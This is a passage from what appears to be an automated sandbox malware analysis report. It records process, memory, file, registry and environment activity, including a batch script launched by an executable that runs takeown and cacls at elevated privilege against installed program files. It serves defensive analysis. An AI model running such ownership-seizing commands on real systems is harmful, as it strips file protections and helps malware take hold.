| pagefile_0x0000000000f70000 | 0x00f70000 | 0x00f70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00f81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f90000 | 0x00f90000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x05050000 | 0x0510dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005140000 | 0x05140000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052c0000 | 0x052c0000 | 0x053bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055b0000 | 0x055b0000 | 0x055bffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74030000 | 0x74057fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f5d0000 | 0x7f5d0000 | 0x7f6cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f6d0000 | 0x7f6d0000 | 0x7f6f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6f6000 | 0x7f6f6000 | 0x7f6f6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6f9000 | 0x7f6f9000 | 0x7f6f9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6fa000 | 0x7f6fa000 | 0x7f6fcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6fd000 | 0x7f6fd000 | 0x7f6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #24: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Java\se-viii.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeb8 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F94
0x
C94
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x04b3ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b40000 | 0x04b40000 | 0x04b4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b70000 | 0x04b70000 | 0x04b83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cd0000 | 0x04cd0000 | 0x04cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ce0000 | 0x04ce0000 | 0x04ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04cf1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d00000 | 0x04dbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052d0000 | 0x052d0000 | 0x052dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052e0000 | 0x05616fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e1b0000 | 0x7e1b0000 | 0x7e2affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e2b0000 | 0x7e2b0000 | 0x7e2d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e2d6000 | 0x7e2d6000 | 0x7e2d8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e2d9000 | 0x7e2d9000 | 0x7e2dbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e2dc000 | 0x7e2dc000 | 0x7e2dcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e2df000 | 0x7e2df000 | 0x7e2dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 40 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xb20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x7fc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xf78, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "se-viii.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "se-viii.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #26: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:55, Reason: Child Process |
| Unmonitor | End Time: 00:01:57, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe10 |
| Parent PID | 0xb70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E38
0x
AF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e50000 | 0x00e50000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x00e5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00e71fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00e70000 | 0x00e74fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x00e93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00f1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f20000 | 0x00f20000 | 0x00f23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f30000 | 0x00f30000 | 0x00f30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f90000 | 0x00f90000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001090000 | 0x01090000 | 0x0109ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x010a0000 | 0x0115dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0119ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011a0000 | 0x011a0000 | 0x011a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011b0000 | 0x011b0000 | 0x011b0fff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005400000 | 0x05400000 | 0x0540ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005410000 | 0x05410000 | 0x05590fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000055a0000 | 0x055a0000 | 0x0699ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x069a0000 | 0x06cd6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x73850000 | 0x73877fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed40000 | 0x7ed40000 | 0x7ee3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee40000 | 0x7ee40000 | 0x7ee62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee68000 | 0x7ee68000 | 0x7ee68fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee69000 | 0x7ee69000 | 0x7ee6bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee6c000 | 0x7ee6c000 | 0x7ee6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee6f000 | 0x7ee6f000 | 0x7ee6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #27: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #27 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Journal.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:55, Reason: Child Process |
| Unmonitor | End Time: 00:01:57, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee0 |
| Parent PID | 0xcd4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F6C
0x
EDC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00ce3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d70000 | 0x00d70000 | 0x00d73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x00d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00d91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e8ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f140000 | 0x7f140000 | 0x7f162fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f16b000 | 0x7f16b000 | 0x7f16bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f16c000 | 0x7f16c000 | 0x7f16efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f16f000 | 0x7f16f000 | 0x7f16ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #28: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Multimedia Platform\separate.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:56, Reason: Child Process |
| Unmonitor | End Time: 00:01:58, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa84 |
| Parent PID | 0x1b4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FBC
0x
ED4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000007d0000 | 0x007d0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
